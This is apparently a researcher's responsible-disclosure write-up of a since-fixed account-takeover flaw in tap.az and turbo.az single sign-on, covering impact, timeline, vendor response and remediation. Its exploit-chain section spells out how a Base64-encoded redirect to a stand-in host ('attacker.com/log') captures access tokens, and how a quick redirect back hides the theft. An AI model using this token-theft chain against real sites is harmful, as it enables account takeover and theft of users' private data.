CVSS 9.6 Account Takeover in Azerbaijan's Most Visited Platforms
CVSS Analysis
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
Executive Summary
In September 2025, I identified a critical vulnerability affecting Digital Classifieds Azerbaijan MMC’s tap.az and turbo.az platforms. The flaw existed within the central authentication infrastructure for their flagship platforms.
By chaining an Open Redirect with an insecure token transmission mechanism, I demonstrated how an attacker could steal access_tokens. This allowed for complete account takeover (ATO) without requiring user credentials or complex interaction.
Technical Breakdown
The vulnerability resided in the Single Sign-On (SSO) subdomains: hello.tap.az and hello.turbo.az. These endpoints handle user sessions and generally are pretty secure. However, they featured an insecure back_to/return_to parameter that accepted Base64-encoded URLs for redirection after login. After successful authentication, the server would redirect users to the specified URL, appending the access_token in the query string.
The Root Cause
Two distinct misconfigurations created the exploit chain:
- Weak Validation: The back_to/return_to parameters accepted Base64-encoded URLs but failed to validate the decoded origin against a strict allow-list or relative paths. This allowed attackers to specify arbitrary external URLs.
- Token Leakage: Upon redirecting the user, the server appended the sensitive JWT token called access_token directly to the destination URL's query string rather than using secure headers or cookies.
The Exploit Chain
- Payload: Attacker encodes a malicious destination: base64("https://attacker.com/log").
- Delivery: Attacker abuses the original login flow: https://hello.tap.az/login?back_to=[PAYLOAD].
- Execution: Upon user login, the server redirects to the attacker's URL with the token: https://attacker.com/log?access_token=eyJhbGci....
- Exfiltration: The browser navigates to https://attacker.com/log?access_token=eyJhbGci..., leaking the session key to the attacker's logs.
- Masquerade: Attacker can be a little clever and redirect the user back to the original site after token capture to avoid suspicion. If the attacker uses 30X redirects, even the browser history remains clean.
Proof of Concept
I created a non-destructive POC using Beeceptor to simulate how an attacker could abuse the vulnerability to capture tokens.
Impact Analysis
This vulnerability had a demonstrated critical impact:
- Scale: Affects millions of monthly active users across the country’s largest general and automotive marketplaces, totaling over 5 million accounts.
- Data Privacy: Attackers could access full PII, unencrypted private messages, and contact details.
- Financial Risk: Ability to manipulate active listings, delete ads, or post fraudulent content from trusted accounts.
Disclosure Timeline & Vendor Response
I followed a strict responsible disclosure process. In the Azerbaijani tech ecosystem, security researchers often face legal threats or silence rather than cooperation. Digital Classifieds Azerbaijan MMC proved to be an exceptional outlier, setting a gold standard for how local companies should handle security reports.
Despite not having a public Bug Bounty program at the time, their response was immediate and professional once I established contact with the right stakeholders.
- Sep 18, 2025: Vulnerability identified.
- Sep 19, 2025: POC created; impact assessment finalized.
- Sep 25, 2025: Escalated to leadership via LinkedIn.
- Oct 10, 2025: Full technical report submitted to the Security Team.
- Oct 13, 2025: Triaged & Fixed. The team confirmed the patch and voluntarily awarded a $XXXX bounty.
- Oct 15, 2025: Bounty Increased to $XXXX. After internal review, the company voluntarily increased the bounty amount by roughly 65% to better reflect the criticality of the finding.
A Benchmark for the Azerbaijani Tech Industry
I want to specifically highlight the professionalism of Mammad Mammadov and the engineering leadership at Digital Classifieds.
It is unfortunately rare for companies in the region to acknowledge external security findings without hostility. Digital Classifieds not only accepted the report but treated it as a collaborative opportunity to improve their security posture. They:
- Prioritized Remediation: Fixed the issue immediately to protect their 5M+ users.
- Rewarded Research: Offered a bounty without a pre-existing policy.
- Valued Impact: Voluntarily increased the reward after understanding the full severity (ATO), rather than trying to downplay the risk.
This behavior is a bright example for the rest of the Azerbaijani market. Security through obscurity is not a strategy; collaboration with the research community is. Digital Classifieds has shown that they value user data integrity over ego.
Remediation
The engineering team at Digital Classifieds implemented a robust fix by:
- Enforcing server-side mapping for redirect targets (ID-based instead of URL-based).
- Restricting back_to parameters to internal domains only.
- Moving session tokens from URL parameters to HttpOnly/SameSite cookies.